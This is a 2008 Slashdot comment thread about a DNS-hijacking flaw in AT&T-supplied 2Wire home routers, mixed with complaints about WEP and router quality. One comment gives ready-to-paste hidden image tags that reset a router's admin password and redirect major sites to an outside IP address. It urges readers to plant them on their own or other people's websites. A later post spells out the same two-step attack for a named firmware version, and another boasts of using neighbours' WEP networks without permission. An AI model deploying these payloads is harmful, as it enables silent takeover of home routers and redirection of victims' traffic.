  Pretty sad. Looks like another case of corporate head-in-the-sand behavior. That and the usual complete disregard for their customers. Fortunately this exploit is pretty easy to circumvent; don't buy 2Wire products! Get the the word out. And teach the neos to never use WEP. If they can't do virtual tunnels with certs then at least make sure they are using WPA. And change those factory installed passwords people!
  
  --
  Python: 'And then suddenly you have a language which says "we're all stuck with whatever the whiniest coder wants".'
2. Re:2Wire routers also very weak on WEP by Jeffrey+Baker · 2008-04-08 10:21 · Score: 3, Interesting
  
  Well, the 2Wire is the box the telco sends you when you order an ADSL line, so your average ignorant consumerbot has no reason to get anything else.
3. Re:2Wire routers also very weak on WEP by compro01 · 2008-04-08 11:00 · Score: 2, Informative
  
  hmm. the 2wire boxes i see (2700s) are default WEP, but have the option for WPA and WPA2.
  
  --
  upon the advice of my lawyer, i have no sig at this time
4. Re:2Wire routers also very weak on WEP by AngelofDeath-02 · 2008-04-08 15:02 · Score: 1
  
  It doesn't help that the default code will always contain 0-9 for possible keys, either.
  
  From a user perspective, I can't blame them. You wouldn't want to be on the phone with someone who thinks their wireless "DHL" modem doesn't need power because it's wireless, and try figuring out what those tiny letters are ...
  
  I think it would have been a lot more secure if they had used phrases that added up to 26 characters instead. But really, not many manufacturers have the balls to support secure wep by default ...
  
  --
  No, I am not an English major. My posts are subject to typos and incorrect grammar. Do not expect perfection.
5. Re:2Wire routers also very weak on WEP by MROD · 2008-04-08 18:55 · Score: 1
  
  The security aspect for wireless and all the other parts of the system are determined not by 2Wire but by the OEMs who are specifying the firmware.
  
  2Wire don't sell retail, they only sell to ISPs and produce custom firmware for them (which, in some cases can tie the modem to the ISP).
  
  --
  
  Agrajag: "Oh no, not again!"
6. Re:2Wire routers also very weak on WEP by taskiss · 2008-04-09 00:08 · Score: 1
  
  "hard-coded"?
  
  You just lost credibility. Instead of riding around on a bike running scripts you ripped off the internet and feeling all 1337 and shit, you should read more about how to program.
  
  A "hard-coded" configurable parameter.. heh, you one funny script kiddie!
  
  --
  - real hackers don't have sigs -
7. Re:2Wire routers also very weak on WEP by NickDngr · 2008-04-09 05:41 · Score: 1
  
  2Wire access points also come hard-coded for 56-bit WEP
  No, they don't come hard-coded. Rather, they come pre-configured with WEP security enabled. That's an improvement over no security, which is the way most routers are sold. They are also configurable to use WPA and WPA2.
  
  --
  Yoda of Borg am I! Assimilated shall you be! Futile resistance is, hmm?
If you have a website, paste the following code by BlueUnderwear · 2008-04-08 10:04 · Score: 2, Interesting

Thanks so much for that URL.
If you want to join into the phun, put the following onto your website (or onto somebody else's website, if he happens to still use IIS):
<img src="http://192.168.1.254/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin" width="1" height="1" alt="haha"/> <img src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=google.com&ADDR=158.64.72.228" width="1" height="1" alt="haha"/> <img src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.google.com&ADDR=158.64.72.228" width="1" height="1" alt="haha"/> <img src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=cnn.com&ADDR=158.64.72.228" width="1" height="1" alt="haha"/> <img src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.cnn.com&ADDR=158.64.72.228" width="1" height="1" alt="haha"/> <img src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=slashdot.org&ADDR=158.64.72.228" width="1" height="1" alt="haha"/> <img src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.slashdot.org&ADDR=158.64.72.228" width="1" height="1" alt="haha"/>

--
Say no to software patents.
of course they won't care?! by timmarhy · 2008-04-08 10:36 · Score: 1

There won't be any repercussions for them. the customer will get screwed, why would they care?

--
If you mod me down, I will become more powerful than you can imagine....
1. Re:of course they won't care?! by compro01 · 2008-04-08 11:04 · Score: 4, Funny
  
  We don't care. We don't have to. We're the Phone Company.
  
  --
  upon the advice of my lawyer, i have no sig at this time
2. Re:of course they won't care?! by Boronx · 2008-04-08 11:45 · Score: 1
  
  And congress is on the verge of granting AT&T amnesty, so why should they care?
  
  AT&T is evil, not just the normal corrupt incompetence of every big phone company, but they actively engage in wrongdoing.
  
  --
  Play Command HQ online
Re:I'm not suprised, given my experience with 2wir by compro01 · 2008-04-08 10:55 · Score: 1

i've worked with these things (their 2700 gateways). they're great modems (though really really sensitive to surges), but these guys do not know how to design the router side. go above a couple hundred connections, and it crashes it (hitting "refresh all" in the CS server browser will do this almost every time). try to transfer files between wired and wireless (or vise versa) and it slows to a crawl. best idea is put the damn thing in bridge mode and get a real router.

--
upon the advice of my lawyer, i have no sig at this time
Liability Issues? by 2think · 2008-04-08 11:01 · Score: 1

I'm not a legal eagle by any means but if someone out there has the knowledge or connections, can you shed some light on liability?
I mean, if it is that AT&T has deployed customer equipment with known exploits, I would think the user would be limited in their liability - or so it seems to a rational mind. Not only is this bad news for consumers as a whole but it is just as bad - if not worse - for businesses such as the small businesses that use these modems/routers.
There's one other exploit... by writermike · 2008-04-08 11:03 · Score: 1

These devices also suffer from another exploit -- the one where technicians come in and leave the WiFi completely open and not tell the customer or, worse, tell them they're "protected" because it's "firewalled."

I've seen this with my own eyes dozens of times. :-(

--
If Nalgene water bottles are outlawed, only outlaws will have Nalgene water bottles.
Re:I'm not suprised, given my experience with 2wir by amRadioHed · 2008-04-08 11:03 · Score: 1

Yeah, total garbage. The wireless on mine is basically useless. When I could get a connection it I got maybe 5% of the bandwidth I was supposed to have, and this is from about 5 feet from the base station.

Also the routing is screwy, it won't route my external IP address from inside the network so I can't use my domain name to log into my server when I'm home. What a joke.

--
We hope your rules and wisdom choke you / Now we are one in everlasting peace
Mod Parent Up! by Valdrax · 2008-04-08 11:42 · Score: 1

i've worked with these things (their 2700 gateways). they're great modems (though really really sensitive to surges), but these guys do not know how to design the router side. go above a couple hundred connections, and it crashes it (hitting "refresh all" in the CS server browser will do this almost every time). try to transfer files between wired and wireless (or vise versa) and it slows to a crawl. best idea is put the damn thing in bridge mode and get a real router. I've got a 2701, and the thing just falls completely apart whenever I use BitTorrent. I thought it was issues with the terrible connection which I have (12-9 dB SNR), so I called a tech out to fix it (improving it to 15-12 db), but that didn't do much.

I've often suspected the router itself due to the fact that this never happens when I'm maxing out my internet connection with only a couple of transactions, but that settles it. I'm getting a new router.

--
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").
1. Re:Mod Parent Up! by houstonbofh · 2008-04-08 13:06 · Score: 1
  
  I've got a 2701, and the thing just falls completely apart whenever I use BitTorrent.
  
  That is a feature to keep bittorrent traffic manageable. :) (However, this may not really be a joke.)
2. Re:Mod Parent Up! by compro01 · 2008-04-08 14:56 · Score: 1
  
  alternatively, a temporarily solution that's been found is to cap the simultaneous connections limit in your bittorrent client below 100. this problem is well known at sasktel, which is why they started putting the things in bridge mode for all the extreme (highest tier) installs.
  
  the problem is the NAT software basically eating all the memory and it effectively kernel panics, with sometimes interesting results. i saw one instance where doing that would cause it to temporarily toss the bandwidth limiter and make available all possible bandwidth on the line (20-some megabits) for about 20 minutes before it went back to normal.
  
  --
  upon the advice of my lawyer, i have no sig at this time
ATT U-verse by Anonymous Coward · 2008-04-08 13:14 · Score: 0

"So far, AT&T/2Wire haven't done anything about this exploit."

A new firmware 5.29.105.94 for 2Wire 3800HGV-B (ATT U-Verse ADSL) offers a solution to this exploit.

http://www.uverseusers.com/component/option,com_smf/Itemid,2/topic,7112.0/
So AT&T can use the xploit themselves? by Anonymous Coward · 2008-04-08 13:35 · Score: 0

They are one very shady company
Telus gave me a 2WIRE by Phil+Urich · 2008-04-08 17:12 · Score: 1

When I moved to my new place, Telus gave me a 2WIRE. I recoiled at the clunky, bloated thing. As luck would have it, there were physical problems with my hookup (yes, this was luck, trust me) and when the Telus guy came out to fix it and realized I knew what I was doing (which made his job a hell of a lot easier) as well as gawked at my dual-monitor setup ("My wife doesn't let me buy stuff like that anymore") I asked him if there was any way to fix the friggin' 2WIRE piece of crap.

He said "well hey, that's for our...well, normal customers. Obviously you don't need a firewall or a wireless router or all that." He gave me a tiny little Thompson SpeedTouch 516v6 and mentioned it even trained a lot faster than the 2WIRE thing too. I've been happy ever since.

The moral of the story, bug your ISP! Sometimes what they give you isn't actually the only option.

--
I remember sigs. Oh, a simpler time!
1. Re:Telus gave me a 2WIRE by Anonymous Coward · 2008-04-19 02:10 · Score: 0
  
  Good for you.
Modem or Router? by VincenzoRomano · 2008-04-08 18:01 · Score: 1

The correct device type is router, as modems are just dumb devices with no DNS feature at all.
The fact that a box attaches to a PC for Internet access doesn't imply it is a modem.

--
Maybe Computers will never be as intelligent as Humans.
For sure they won't ever become so stupid. [VR-1988]
1. Re:Modem or Router? by Thelasko · 2008-04-09 01:13 · Score: 1
  
  Actually, the devices in question are both. But, the problem is in the router part.
  
  --
  One of our competitors trademarked the term "hypothesis". From now on, we will call them "boneheaded ideas".
Re:I'm not suprised, given my experience with 2wir by MROD · 2008-04-08 18:52 · Score: 1

Well, the 2700 series at least run a version of BSD Unix. The firewall/router is ipf, a well used packet filter.

What they have added is there own DNS server, which is a bit rubbish.

In defence of 2Wire, the grandparent's problems sound like a hardware problem to me. The flash memory seems to have been dying.

The one thing about the 2700 series is that they *WILL* get you about a 1Mb/s increase in ADSL connection speed over other modems and with long lines this can make a real difference.

--

Agrajag: "Oh no, not again!"
Telus by DaveCBio · 2008-04-08 20:11 · Score: 1

I have a 2Wire 2700HG-E from Telus. I assume this would have the same vulnerability?
WEP: So weak a liberal arts major can crack it! by Anonymous Coward · 2008-04-08 23:39 · Score: 0

Honestly. I am a liberal arts major - a somewhat geeky liberal arts major that can set up my own home network, but a liberal arts major nonetheless - and I can easily gain access to the many WEP-secured networks up in my neighborhood, just by using tools that are readily available online with a smart google search. There are 3 that I can reach without even leaving the apartment. I tap into them when my roommate complains about my pr0n torrents hogging bandwidth.

So I suppose the take-away is to never for the love of god use WEP, unless you want your WiFi network to be a haven for bandwidth-leeching liberal arts porn hounds.
Yep by StarKruzr · 2008-04-09 01:26 · Score: 1

They gave me one for my house. I ended up replacing it with an old SpeedStream I had and a TrendNet router. The 2700's radio is terrible.

--

+++ATH0
Re:I'm not suprised, given my experience with 2wir by hesaigo999ca · 2008-04-09 02:49 · Score: 1

Is it possible that this was only the case because you had someone smart enough to hack your router being a wireless router, and not a wired one, and then once in would know the reset commands???
Exploit by jr9730 · 2008-04-09 04:14 · Score: 1

Once again ignorance reigns, I would have asked ATT and 2Wire for information before publishing this..
1. Re:Exploit by Anonymous Coward · 2008-04-09 07:16 · Score: 0
  
  Don't believe everything a company spokesperson tells you. My 2Wire has the vulnerable firmware 4.25.19, as does another earlier poster. DSLreports forum has reports of very recent exploitation, too. When do we get our updates? There's a manual update button, but it just tells me I already have the latest version.
2. Re:Exploit by jr9730 · 2008-04-09 14:44 · Score: 1
  
  Its most likely already done via a management system, while you slept soundly.
3. Re:Exploit by Anonymous Coward · 2008-04-13 13:53 · Score: 0
  
  Nope, checked it again today - still no update and the exploits still work on my box. Other users on DSLreports also report having vulnerable firmware. http://www.dslreports.com/forum/r20156920-DNS-Hijack-on-2wire-routers
  
  The same thread has posts from two insiders who indicate that the fix is still in beta testing.
  
  So again - don't believe everything a company spokesperson tells you. Actual experience from knowledgeable users is far more reliable.
4.25.19 is VULNERABLE - where's MY update, AT& by Anonymous Coward · 2008-04-09 07:06 · Score: 0

My AT&T/2Wire 1701HG gateway is running firmware 4.25.19, and when I tell it to check for updates, it says I have the latest version. BUT, this version is still vulnerable to the attack. The key is that it takes two URLs instead of one.

Step 1 is to set the password to a known value:
http://192.168.1.254/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin
Step 2 is to set the DNS redirection using our new password:
http://192.168.1.254/xslt?PAGE=A02_POST&PASSWORD=admin&THISPAGE=J38&NEXTPAGE=J38_SET&ADDR=127.0.0.1&NAME=www.example.com
It's nice that the AT&T spokesperson says they've almost finished updating, but if that's really true, why don't I, or the other guy with 4.25.19, have the fixed firmware? How/where/when can I get it? Tech support thinks I'm paranoid.
Depends on the firmware version by Anonymous Coward · 2008-04-09 07:40 · Score: 0

Some of the newer 5.xx firmwares do require an authenticated session to perform this hack, but the 5.xx versions only work on Homeportal 2XXX models. The older HomePortal 1XXX models that AT&T had been deploying until recently still use an older 4.xx firmware, with the most recent known version 4.25.19

That version does not require an authenticated session, because the H04_POST page does not validate password. Thus the attacker simply sends a series of two URLs - the first using H04_POST to set the password to a known value, then the A02_POST page to set the DNS redirect.

See here: http://www.dslreports.com/forum/r20309001-ATT-claims-this-is-fixed
Uh, AT&T/2Wire wasn't telling the truth by sasparillascott · 2008-04-12 04:47 · Score: 1

I have a brand new (got it last week from AT&T) 2Wire gateway that is open to the vulnerability, its internal firmware update facility shows "no update available", no firmware updates available from AT&T support or 2Wire support. So it looks like AT&T's statement was misinformed or deliberately misleading - not a surprise I suppose.